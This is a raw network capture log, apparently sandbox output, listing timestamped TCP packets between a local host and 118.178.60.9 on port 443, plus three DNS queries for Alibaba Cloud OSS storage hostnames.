                                                                                      Jan 9, 2025 01:54:35.817852020 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.817898989 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.819696903 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.819722891 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.819910049 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.819919109 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.819963932 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.820628881 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.820684910 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.820771933 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.820827961 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.826740980 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.826801062 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.826960087 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.827017069 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.829570055 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.829621077 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.829727888 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.829775095 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.847248077 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.847316980 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.847408056 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.847456932 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.849870920 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.849919081 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.850022078 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.850066900 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.853811979 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.853862047 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.853912115 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.853957891 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.862185955 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.862235069 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.862320900 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.862368107 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.868273973 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.873055935 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.873109102 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.873177052 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.873224020 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.888674974 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.888734102 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.888823032 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.888875008 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.898715019 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.898773909 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.898916960 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.898962975 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.899586916 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.899632931 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.899801016 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.899851084 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.902580976 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.902626991 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.902750015 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.902796030 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.902991056 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.903037071 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.903124094 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.903168917 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.907845974 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.907880068 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.907895088 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.907902002 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.907927036 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.907938957 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.908396006 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.908427000 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.908443928 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.908449888 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.908473015 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.908488035 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.910381079 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.910413027 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.910429955 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.910435915 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.910454035 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.910469055 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.911220074 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.911264896 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.911425114 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.911469936 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.917515993 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.917550087 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.917566061 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.917572021 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.917596102 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.917613983 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.920238972 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.920294046 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.920428991 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.920474052 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.938029051 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.938159943 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.938178062 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.938184977 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.938204050 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.938225031 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.940485954 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.940535069 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.940648079 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.940709114 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.944454908 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.944504976 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.944605112 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.944653988 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.953120947 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.953159094 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.953174114 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.953181028 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.953196049 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.953207970 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.963886023 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.963933945 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.963994026 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.964041948 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.979454994 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.979495049 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.979507923 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.979516029 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.979535103 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.979553938 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.989618063 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.989653111 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.989669085 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.989675999 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.989694118 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.989718914 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.990370035 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.990405083 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.990418911 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.990425110 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:35.990448952 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.990464926 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:35.993480921 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883727074 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:39.883729935 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883733988 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883774042 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:39.883779049 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883795023 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883802891 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883821964 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:39.883826971 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883842945 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:39.883846045 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.883929968 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:39.883938074 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:39.884016037 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.091336012 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.091406107 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.515338898 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.515388966 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529561043 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529567003 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529577971 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529582024 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529650927 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529656887 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529664993 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529674053 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529706955 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529711962 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529742956 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529747009 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529755116 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529771090 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529776096 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529786110 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529789925 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529802084 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529805899 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529906034 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.529913902 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.529947996 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.530002117 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:40.735337973 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:40.735604048 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.151340008 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.151603937 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159421921 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159432888 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159446955 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159454107 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159498930 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159504890 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159513950 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159539938 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159544945 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159559011 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159581900 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159586906 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159600973 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159617901 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159625053 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:41.159650087 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.159698963 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:41.892975092 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:43.572192907 CET50014443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:43.572235107 CET44350014118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:43.905019045 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:43.905061007 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:43.905131102 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:43.907742023 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:43.907757044 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.264453888 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.264537096 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.273968935 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.273981094 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.274386883 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.274390936 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.642946959 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.642968893 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.643007994 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.643032074 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.643043995 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.643075943 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.643243074 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.643296957 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.645052910 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.645113945 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.649701118 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.649763107 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.731369972 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.731533051 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.731606007 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.731662035 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.731940985 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.731991053 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.732481003 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.732532024 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.733253956 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.733309984 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.733695984 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.733747959 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.735918999 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.735977888 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.736035109 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.736084938 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.738430977 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.738488913 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.820205927 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820239067 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820365906 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.820365906 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.820377111 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820388079 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820426941 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.820432901 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820475101 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.820575953 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.820628881 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.821223021 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.821270943 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.821351051 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.821398973 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.821516991 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.821566105 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.822141886 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.822191954 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.822660923 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.822710991 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.822736979 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.822782040 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.823338032 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.823374987 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.823389053 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.823398113 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.823417902 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.823437929 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.824086905 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.824137926 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.824692011 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.824745893 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.827054977 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.827126026 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.827213049 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.827272892 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.908742905 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.908802986 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.909981966 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.910037994 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.910145998 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.910237074 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.910293102 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.910343885 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.914484978 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.914546013 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.916836023 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.916910887 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.921432018 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.921489954 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.923783064 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.923866987 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.928430080 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.928556919 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.930823088 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.930893898 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.935529947 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.935594082 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.937874079 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.937937975 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.940130949 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.940208912 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.944977045 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.945045948 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.947098970 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.947151899 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.951865911 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.951997995 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.954189062 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.954257011 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.956490040 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.956548929 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.961143970 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.961196899 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.963624954 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.963677883 CET50015443192.168.2.4118.178.60.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 01:52:51.740251064 CET | 192.168.2.4 | 1.1.1.1 | 0x6ccb | Standard query (0) | a8mw1y.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:13.155464888 CET | 192.168.2.4 | 1.1.1.1 | 0x1fcc | Standard query (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 01:54:14.168240070 CET | 192.168.2.4 | 1.1.1.1 | 0x1fcc | Standard query (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | A (IP address) | IN (0x0001) | false
